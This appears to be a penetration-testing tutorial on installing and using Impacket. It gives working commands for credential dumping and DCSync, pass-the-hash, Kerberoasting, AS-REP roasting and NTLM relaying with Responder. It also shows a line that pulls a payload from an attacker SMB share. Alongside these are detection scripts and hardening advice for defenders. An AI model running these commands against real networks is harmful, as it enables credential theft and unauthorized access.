Impacket is a Python library plus a pile of script wrappers for talking to Windows network protocols (SMB, MSRPC, NTLM, Kerberos). On a red team or internal pen test, it’s the difference between “I can move around this network” and “I’m staring at port 445 wondering what to do.” This post covers installing it without breaking your global Python and walks through the handful of scripts you’ll actually use most.
## What is Impacket
Impacket is a collection of Python classes and example scripts for the network protocols Windows speaks: SMB, MSRPC, NTLM, Kerberos. Once it’s installed, you can authenticate, enumerate, run remote commands, dump credentials, and relay authentication — all without dropping anything on the target.
Impacket includes useful tools and utilities, including:

- smbclient.py: an SMB client for interacting with shares and performing file operations
- samrdump.py: a tool for enumerating users and groups via the SAMR RPC interface
- wmiexec.py: semi-interactive command execution using WMI
- psexec.py: remote command execution via SMB and the Windows Service Control Manager (SCM)
- secretsdump.py: credential material extraction (SAM/LSA/NTDS techniques)
- GetUserSPNs.py / GetNPUsers.py: ticket requests for offline analysis (when configured in AD)
## Installing Impacket: The professional way
### Step 1: Install Python and pip
Before installing Impacket, you’ll need to ensure you have Python and pip installed on your system. Many Linux distributions ship with Python 3, but macOS does not always include python3 by default. To check, open a terminal window and type:

```
python3 --version
```

If you see output that looks like `Python 3.10.6`, you are good to go. Impacket works best with Python 3.8+.
### Step 2: Install pipx
While you can install Impacket directly into your global Python environment with pip, I strongly advise against it. This can lead to “dependency hell” where different tools require conflicting versions of libraries.
Instead, use pipx. pipx installs tools in isolated environments and exposes their commands globally.
```
# Install pipx
python3 -m pip install --user pipx
python3 -m pipx ensurepath
# Reload your shell
source ~/.bashrc   # or ~/.zshrc
```

### Step 3: Installing Impacket via pipx
Now, install Impacket. If you need the latest features, install it directly from the GitHub repository:
```
pipx install git+https://github.com/fortra/impacket.git
```

This command creates a dedicated virtual environment for Impacket, installs all dependencies, and links all the scripts (secretsdump.py, wmiexec.py, etc.) into your PATH. You can now run them from anywhere!
To update it later, simply run:
```
pipx upgrade impacket
```

If you want to pin to a specific branch or commit for repeatable tooling during an engagement, reinstall with an explicit ref:

```
pipx install --force git+https://github.com/fortra/impacket.git@<branch-or-commit>
```

## The tools you’ll actually use
Impacket ships ~60 scripts. In practice you’ll use a small subset most of the time. These are the ones worth knowing cold.
### 1. secretsdump.py: credential extraction
secretsdump.py is the most-used script in the suite. It dumps secrets from a remote machine using a handful of different techniques, none of which require dropping an agent on the target.
Key Features:
- Dumps NTLM hashes from the SAM database.
- Dumps LSA secrets.
- Dumps the NTDS.dit (Active Directory database) via DRSUAPI.
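The DRSUAPI replication path that secretsdump.py uses for DCSync is also what a defender watches for: with "Audit Directory Service Access" enabled, each replication request lands on the domain controller as Security event 4662 whose Properties field lists the replication control-access-right GUIDs. The script below is an added example written for this post, not Impacket code; it assumes the events have already been parsed into dicts keyed by the Windows XML field names, and every sample event is constructed.

```python
"""Flag DCSync-style replication requests in Security event 4662 (added example).

Assumes event records are dicts keyed by the XML field names Windows uses
(EventID, SubjectUserName, Properties, ...). Sample data is constructed.
"""
from __future__ import annotations
import re

# Control-access-right GUIDs that authorise directory replication. A DCSync
# request needs Get-Changes plus Get-Changes-All; the filtered-set right is
# included so partial (RODC-style) replication by unexpected accounts is seen too.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = "0x100"  # ADS_RIGHT_DS_CONTROL_ACCESS, the AccessMask on these events
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.IGNORECASE)


def replication_rights(properties: str) -> list:
    """Names of the replication rights listed in a 4662 Properties field."""
    found = {g.lower() for g in GUID_RE.findall(properties)}
    return sorted(REPLICATION_RIGHTS[g] for g in found if g in REPLICATION_RIGHTS)


def is_expected_replicator(account: str, allowlist: frozenset) -> bool:
    """Domain controllers replicate under their machine accounts (trailing '$');
    any other legitimate replicator, e.g. a directory-sync service account,
    has to be allow-listed explicitly."""
    return account.endswith("$") or account.lower() in {a.lower() for a in allowlist}


def find_dcsync(events: list, allowlist: frozenset = frozenset()) -> list:
    """One alert per 4662 event where a non-DC, non-allow-listed account used a replication right."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662 or ev.get("AccessMask") != CONTROL_ACCESS:
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if not rights:
            continue
        account = ev.get("SubjectUserName", "")
        if is_expected_replicator(account, allowlist):
            continue
        alerts.append({
            "time": ev.get("TimeCreated"),
            "dc": ev.get("Computer"),
            "account": f"{ev.get('SubjectDomainName', '')}\\{account}",
            "rights": rights,
        })
    return alerts


# Constructed sample events (not real log data). The second GUID in the
# Properties strings is the domainDNS object class, as a real event would carry.
SAMPLE_EVENTS = [
    {   # routine replication between two domain controllers
        "EventID": 4662, "TimeCreated": "2024-05-01T09:00:01", "Computer": "DC01.corp.local",
        "SubjectDomainName": "CORP", "SubjectUserName": "DC02$", "AccessMask": "0x100",
        "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}",
    },
    {   # directory-sync service account, expected and allow-listed by the caller
        "EventID": 4662, "TimeCreated": "2024-05-01T09:05:13", "Computer": "DC01.corp.local",
        "SubjectDomainName": "CORP", "SubjectUserName": "svc-dirsync", "AccessMask": "0x100",
        "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} "
                      "{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
    },
    {   # unrelated 4662: a write to a user object, no replication right involved
        "EventID": 4662, "TimeCreated": "2024-05-01T09:07:45", "Computer": "DC01.corp.local",
        "SubjectDomainName": "CORP", "SubjectUserName": "helpdesk1", "AccessMask": "0x20",
        "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}",
    },
    {   # ordinary user account pulling full replication: the DCSync pattern
        "EventID": 4662, "TimeCreated": "2024-05-01T09:12:02", "Computer": "DC01.corp.local",
        "SubjectDomainName": "CORP", "SubjectUserName": "jsmith", "AccessMask": "0x100",
        "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} "
                      "{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
    },
]

if __name__ == "__main__":
    for alert in find_dcsync(SAMPLE_EVENTS, allowlist=frozenset({"svc-dirsync"})):
        print(alert)
```

The allowlist is the part that needs local knowledge: anything that legitimately replicates without being a DC (directory synchronisation services, some backup products) will otherwise fire on every sync cycle, and a rule that fires constantly is a rule nobody reads.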
Usage Examples:
Dump local SAM hashes using local admin credentials:
```
secretsdump.py 'DOMAIN/User:Password@192.168.1.10'
```

Dump the entire Domain Controller database (DCSync attack):

```
secretsdump.py -just-dc-ntlm 'DOMAIN/DomainAdmin:Password@DC_IP'
```

### 2. smbserver.py: stand up an SMB share
Need to exfiltrate data or host a payload for a target to download? smbserver.py sets up a lightweight SMB server in seconds.
Usage:
```
# Share the current directory as "SHARE"
sudo smbserver.py SHARE . -smb2support
```

On the victim machine, you can now access your files:

```
copy \\YOUR_IP\SHARE\payload.exe C:\Windows\Temp\
```

Pro Tip: This is also great for capturing NTLMv2 hashes if you can trick a user or service into authenticating to your share.
### 3. wmiexec.py: WMI-based remote command execution
wmiexec.py allows you to execute commands on a remote Windows system using the Windows Management Instrumentation (WMI) protocol, providing a semi-interactive shell.
Why use it over PsExec?
PsExec-style execution commonly involves creating a service on the target, which is often high-signal to defenders. wmiexec.py uses WMI to create processes and is frequently quieter than service-based approaches, but it can still generate logs and may touch the filesystem indirectly (for example, for output retrieval) depending on configuration and target settings.
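"Quieter" is relative: the process that wmiexec.py creates is spawned by the WMI provider host (WmiPrvSE.exe), and by default the command is wrapped as `cmd.exe /Q /c <cmd> 1> \\127.0.0.1\ADMIN$\__<timestamp> 2>&1` so that the output can be read back over SMB, which is the indirect filesystem touch mentioned above. That parent/child relationship plus the loopback redirect is a well-known shape in process-creation telemetry. The rule below is an added example for this post, not Impacket code; it uses Sysmon Event ID 1 field names, and the sample records are constructed.

```python
"""Recognise wmiexec.py-style process creation in endpoint telemetry (added example).

Records use Sysmon Event ID 1 field names (ParentImage, Image, CommandLine, ...).
The sample records below are constructed, not real telemetry.
"""
import re

# Output redirected to a UNC path on the loopback address, onto an admin share,
# into a file named "__<timestamp>": the default wmiexec.py output channel.
# The share name is a command-line option of the script, so any share is accepted.
WMIEXEC_REDIRECT = re.compile(
    r"1>\s*\\\\127\.0\.0\.1\\[A-Za-z0-9$]+\\__\S+\s+2>&1", re.IGNORECASE
)
SHELLS = ("\\cmd.exe", "\\powershell.exe", "\\pwsh.exe")


def classify_process_event(ev: dict) -> str:
    """Return 'wmiexec', 'wmi-spawned-shell' or 'benign' for one process-creation record."""
    parent = ev.get("ParentImage", "").lower()
    image = ev.get("Image", "").lower()
    if not parent.endswith("\\wmiprvse.exe") or not image.endswith(SHELLS):
        return "benign"
    if WMIEXEC_REDIRECT.search(ev.get("CommandLine", "")):
        return "wmiexec"
    # WmiPrvSE spawning a shell without the redirect is still worth a look, but
    # management agents do it legitimately, so this tier needs per-environment tuning.
    return "wmi-spawned-shell"


def triage(events: list) -> list:
    """Non-benign records as (UtcTime, User, verdict) tuples, in log order."""
    out = []
    for ev in events:
        verdict = classify_process_event(ev)
        if verdict != "benign":
            out.append((ev.get("UtcTime"), ev.get("User"), verdict))
    return out


# Constructed Sysmon-style records (not real telemetry).
SAMPLE_EVENTS = [
    {"UtcTime": "2024-05-01 10:14:03", "User": "CORP\\jsmith",
     "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1714558443.187436 2>&1"},
    {"UtcTime": "2024-05-01 10:20:11", "User": "NT AUTHORITY\\SYSTEM",
     "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -File C:\\ProgramData\\Agent\\inventory.ps1"},
    {"UtcTime": "2024-05-01 10:21:40", "User": "CORP\\jsmith",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe"},
    {"UtcTime": "2024-05-01 10:22:05", "User": "NT AUTHORITY\\SYSTEM",
     "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "Image": "C:\\Windows\\System32\\conhost.exe",
     "CommandLine": "\\??\\C:\\Windows\\system32\\conhost.exe 0x4"},
]

if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(*row)
```

The two tiers matter in practice: the redirect pattern is specific enough to page on, while "WmiPrvSE.exe spawned a shell" is a hunting query, because inventory and configuration-management agents produce exactly that every day.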
Usage:
```
wmiexec.py 'DOMAIN/User:Password@TargetIP'
```

If you only have the hash (Pass-the-Hash):

```
wmiexec.py -hashes :NTLM_HASH 'DOMAIN/User@TargetIP'
```

## Advanced attacks: Authentication and relaying
### Kerberoasting with GetUserSPNs.py
Kerberoasting is a technique to request service tickets (TGS) for service accounts and crack them offline to recover the plaintext password.
Execution:
```
# Request TGS for all users with SPNs
GetUserSPNs.py 'DOMAIN/User:Password' -dc-ip 192.168.1.5 -request
```

This will output Hashcat-formatted hashes. Save them and crack them!
### AS-REP Roasting with GetNPUsers.py
This attack targets users with “Do not require preauthentication” enabled. You don’t even need a valid domain user password—just a username list!
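Both of these ticket-based techniques, Kerberoasting from the previous section and AS-REP roasting here, leave their trace on the domain controller rather than the endpoint. Kerberoasting shows up as Security event 4769 (TGS requested) with an RC4-encrypted ticket (type 0x17, the same etype 23 that the Hashcat format encodes) for a user account with an SPN, usually several different services from one client in a short burst. AS-REP roasting shows up as 4768 (TGT requested) with PreAuthType 0, meaning the KDC replied without pre-authentication. The detection below is an added example written for this post, not Impacket code; events are dicts keyed by the Windows XML field names, and the samples are constructed.

```python
"""Kerberoasting and AS-REP roasting indicators in DC Security logs (added example).

Event records are dicts with the Windows XML field names; sample data is constructed.
"""
from collections import defaultdict

RC4_HMAC = "0x17"   # TicketEncryptionType for RC4-HMAC (etype 23)
SUCCESS = "0x0"     # Status / result code on a granted request


def is_user_spn_request(ev: dict) -> bool:
    """True when the requested service is a user account with an SPN, the
    Kerberoast target set; machine accounts ($) and krbtgt are excluded."""
    svc = ev.get("ServiceName", "")
    return bool(svc) and not svc.endswith("$") and not svc.lower().startswith("krbtgt")


def find_kerberoast_bursts(events: list, window: int = 60, min_services: int = 3) -> list:
    """Group successful RC4 TGS requests for user SPNs by (client, requester) and
    report each group that touched >= min_services distinct services inside `window` seconds."""
    groups = defaultdict(list)
    for ev in events:
        if ev.get("EventID") != 4769 or ev.get("Status") != SUCCESS:
            continue
        if ev.get("TicketEncryptionType") != RC4_HMAC or not is_user_spn_request(ev):
            continue
        groups[(ev.get("IpAddress"), ev.get("TargetUserName"))].append((ev["Time"], ev["ServiceName"]))
    alerts = []
    for (client, user), reqs in groups.items():
        reqs.sort()
        for start, _ in reqs:  # slide a window starting at each request
            services = {svc for t, svc in reqs if start <= t <= start + window}
            if len(services) >= min_services:
                alerts.append({"client": client, "user": user, "services": sorted(services)})
                break
    return alerts


def find_asrep_roast(events: list) -> list:
    """Successful TGT requests that skipped pre-authentication (PreAuthType 0).
    The event's TicketEncryptionType describes the issued TGT, so it is carried
    as context rather than used as the trigger."""
    return [
        {"client": ev.get("IpAddress"), "user": ev.get("TargetUserName"),
         "etype": ev.get("TicketEncryptionType")}
        for ev in events
        if ev.get("EventID") == 4768 and ev.get("Status") == SUCCESS and ev.get("PreAuthType") == "0"
    ]


# Constructed sample events (Time is epoch seconds; not real log data).
def _tgs(t, client, user, svc, etype):
    return {"EventID": 4769, "Time": t, "IpAddress": client, "TargetUserName": user,
            "ServiceName": svc, "TicketEncryptionType": etype, "Status": SUCCESS}


SAMPLE_EVENTS = [
    _tgs(1000, "::ffff:10.0.0.50", "jsmith@CORP.LOCAL", "svc_sql", RC4_HMAC),
    _tgs(1004, "::ffff:10.0.0.50", "jsmith@CORP.LOCAL", "svc_http", RC4_HMAC),
    _tgs(1009, "::ffff:10.0.0.50", "jsmith@CORP.LOCAL", "svc_backup", RC4_HMAC),
    _tgs(1012, "::ffff:10.0.0.50", "jsmith@CORP.LOCAL", "svc_sql", RC4_HMAC),
    _tgs(1020, "::ffff:10.0.0.50", "jsmith@CORP.LOCAL", "WS01$", RC4_HMAC),   # machine account, ignored
    _tgs(1030, "::ffff:10.0.0.77", "mbrown@CORP.LOCAL", "svc_sql", "0x12"),   # AES, normal use
    {"EventID": 4768, "Time": 1100, "IpAddress": "::ffff:10.0.0.50", "TargetUserName": "oldsvc",
     "TicketEncryptionType": RC4_HMAC, "PreAuthType": "0", "Status": SUCCESS},
    {"EventID": 4768, "Time": 1101, "IpAddress": "::ffff:10.0.0.12", "TargetUserName": "jsmith",
     "TicketEncryptionType": "0x12", "PreAuthType": "2", "Status": SUCCESS},
]

if __name__ == "__main__":
    print("kerberoast:", find_kerberoast_bursts(SAMPLE_EVENTS))
    print("asrep:", find_asrep_roast(SAMPLE_EVENTS))
```

The cheapest fix on the AS-REP side is to clear "Do not require Kerberos preauthentication" on the accounts that have it; on the Kerberoast side, long random passwords (or group managed service accounts) and AES-only service accounts remove the RC4 signal and the crackability in one move.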
Execution:
```
GetNPUsers.py 'DOMAIN/' -usersfile users.txt -no-pass -format hashcat -outputfile asreproast.txt
```

### NTLM Relaying with ntlmrelayx.py
ntlmrelayx.py is a beast. It listens for incoming NTLM authentication requests (via SMB, HTTP, etc.) and relays them to other machines to execute commands or dump data.
Scenario:
You are on a local network. You start Responder to poison LLMNR/NBT-NS, but you turn off the SMB and HTTP servers in Responder. You pass those requests to ntlmrelayx.
1. Configure Responder: edit `Responder.conf` and set `SMB = Off` and `HTTP = Off`.
2. Start ntlmrelayx:

   ```
   ntlmrelayx.py -tf targets.txt -smb2support
   ```

3. Start Responder:

   ```
   responder -I eth0
   ```
When a victim tries to access a non-existent resource, Responder directs them to you. ntlmrelayx grabs their credentials and relays them to the machines in targets.txt. If the victim is an admin on a target, you get a shell!
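The control that defeats this chain is SMB signing required on every host that could end up in targets.txt: a relayed session cannot produce valid signatures, so a signing-required server rejects it. Whether a host merely enables or actually requires signing is advertised in the SecurityMode field of its SMB2 NEGOTIATE response (MS-SMB2 section 2.2.4), which is what to check after rolling out the "Digitally sign communications (always)" policy. The parser below is an added example written for this post, not Impacket code (Impacket has its own SMB implementation, which is not used here); the responses it inspects are constructed in-process, so it runs entirely offline.

```python
"""Check SMB2 NEGOTIATE responses for required signing (added example).

Parses the fixed part of the NEGOTIATE response from MS-SMB2 section 2.2.4 and
reports whether the server merely enables or actually requires signing. The
responses checked below are constructed in-process; nothing is sent on the network.
"""
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001   # set on responses
SIGNING_ENABLED = 0x0001                  # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002                 # SMB2_NEGOTIATE_SIGNING_REQUIRED
HEADER_LEN = 64
NEGOTIATE_RESP_LEN = 65                   # StructureSize value of the response body
DIALECTS = {0x0202: "2.0.2", 0x0210: "2.1", 0x0300: "3.0", 0x0302: "3.0.2", 0x0311: "3.1.1"}


def parse_negotiate_response(data: bytes) -> dict:
    """Return dialect and signing bits from a raw SMB2 NEGOTIATE response.
    A leading 4-byte NetBIOS session-service header (as seen on TCP/445) is stripped."""
    if len(data) >= 4 and data[0] == 0 and data[:4] != SMB2_MAGIC:
        data = data[4:]
    if len(data) < HEADER_LEN + NEGOTIATE_RESP_LEN or data[:4] != SMB2_MAGIC:
        raise ValueError("not a complete SMB2 message")
    header_size = struct.unpack_from("<H", data, 4)[0]   # StructureSize
    command = struct.unpack_from("<H", data, 12)[0]      # Command
    flags = struct.unpack_from("<I", data, 16)[0]        # Flags
    if header_size != HEADER_LEN or command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    body_size, security_mode, dialect = struct.unpack_from("<HHH", data, HEADER_LEN)
    if body_size != NEGOTIATE_RESP_LEN:
        raise ValueError("unexpected NEGOTIATE response StructureSize")
    return {
        "dialect": DIALECTS.get(dialect, hex(dialect)),
        "signing_enabled": bool(security_mode & SIGNING_ENABLED),
        "signing_required": bool(security_mode & SIGNING_REQUIRED),
    }


def hosts_accepting_unsigned(responses: dict) -> list:
    """Given {host: raw NEGOTIATE response}, list hosts that would accept an unsigned session."""
    return sorted(h for h, raw in responses.items() if not parse_negotiate_response(raw)["signing_required"])


def build_negotiate_response(security_mode: int, dialect: int = 0x0302) -> bytes:
    """Constructed fixture: a minimal, well-formed NEGOTIATE response with no security blob."""
    header = struct.pack("<4sHHIHHIIQIIQ16s", SMB2_MAGIC, HEADER_LEN, 0, 0, SMB2_NEGOTIATE, 1,
                         SMB2_FLAGS_SERVER_TO_REDIR, 0, 0, 0, 0, 0, b"\0" * 16)
    body = struct.pack("<HHHH16sIIIIQQHHI", NEGOTIATE_RESP_LEN, security_mode, dialect, 0,
                       b"\0" * 16, 0, 8 << 20, 8 << 20, 8 << 20, 0, 0, HEADER_LEN + 64, 0, 0)
    return header + body + b"\0"   # one-byte Buffer, as StructureSize 65 implies


def netbios_frame(message: bytes) -> bytes:
    """Wrap an SMB2 message in the 4-byte session-service header used on TCP/445."""
    return struct.pack(">I", len(message)) + message


# Constructed responses for three hypothetical hosts; only ws07 lacks the required bit.
SAMPLE_RESPONSES = {
    "dc01": build_negotiate_response(SIGNING_ENABLED | SIGNING_REQUIRED, 0x0311),
    "fs01": build_negotiate_response(SIGNING_ENABLED | SIGNING_REQUIRED),
    "ws07": netbios_frame(build_negotiate_response(SIGNING_ENABLED)),
}

if __name__ == "__main__":
    for host, raw in SAMPLE_RESPONSES.items():
        print(host, parse_negotiate_response(raw))
    print("accept unsigned:", hosts_accepting_unsigned(SAMPLE_RESPONSES))
```

The distinction the parser draws is the one that matters: Windows servers advertise SIGNING_ENABLED by default, which protects nothing against relay on its own; only SIGNING_REQUIRED closes the door, and the default for member servers and workstations is not required. The same review applies to LDAP (signing and channel binding) when HTTP-captured authentication is relayed there instead.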
## Conclusion
Impacket is one of those tools where the install is the easy part — the hard part is knowing which script to reach for and how to chain them together with whatever else you’ve got loaded. Most of the techniques in this post (Kerberoasting, AS-REP roasting, NTLM relaying, DCSync via secretsdump) will appear in some form on every internal engagement that touches Active Directory.
The big trap to avoid: don’t `sudo pip install impacket` into your system Python. pipx keeps it isolated and updateable, which matters when the project ships fixes faster than your distro packages it.
For more information, check out the official Impacket repository: https://github.com/fortra/impacket